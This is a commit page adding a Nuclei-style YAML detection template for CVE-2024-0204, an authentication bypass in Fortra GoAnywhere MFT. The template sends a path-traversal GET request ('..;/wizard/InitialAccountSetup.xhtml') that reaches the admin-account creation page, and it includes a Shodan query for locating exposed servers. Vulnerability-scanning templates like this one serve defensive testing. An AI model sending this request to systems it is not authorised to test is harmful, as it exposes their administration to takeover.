Merge pull request #8994 from projectdiscovery/CVE-2024-0204
Create CVE-2024-0204.yaml (Fortra GoAnywhere MFT - Authentication Bypass 🔥 )
patch-1
commit
ec480435a9
|
@ -0,0 +1,41 @@
|
|||
id: CVE-2024-0204
|
||||
|
||||
info:
|
||||
name: Fortra GoAnywhere MFT - Authentication Bypass
|
||||
author: DhiyaneshDK
|
||||
severity: critical
|
||||
description: |
|
||||
Authentication bypass in Fortra's GoAnywhere MFT prior to 7.4.1 allows an unauthorized user to create an admin user via the administration portal.
|
||||
reference:
|
||||
- https://my.goanywhere.com/webclient/ViewSecurityAdvisories.xhtml
|
||||
- https://www.fortra.com/security/advisory/fi-2024-001
|
||||
- https://github.com/horizon3ai/CVE-2024-0204/blob/main/CVE-2024-0204.py
|
||||
- https://www.horizon3.ai/cve-2024-0204-fortra-goanywhere-mft-authentication-bypass-deep-dive/
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
||||
cvss-score: 9.8
|
||||
cve-id: CVE-2024-0204
|
||||
cwe-id: CWE-425
|
||||
metadata:
|
||||
verified: true
|
||||
max-request: 1
|
||||
shodan-query: http.favicon.hash:1484947000
|
||||
tags: cve,cve2024,auth-bypass,goanywhere
|
||||
|
||||
http:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/goanywhere/images/..;/wizard/InitialAccountSetup.xhtml"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- "Create an administrator account"
|
||||
- "goanywhere"
|
||||
condition: and
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
Loading…
Reference in New Issue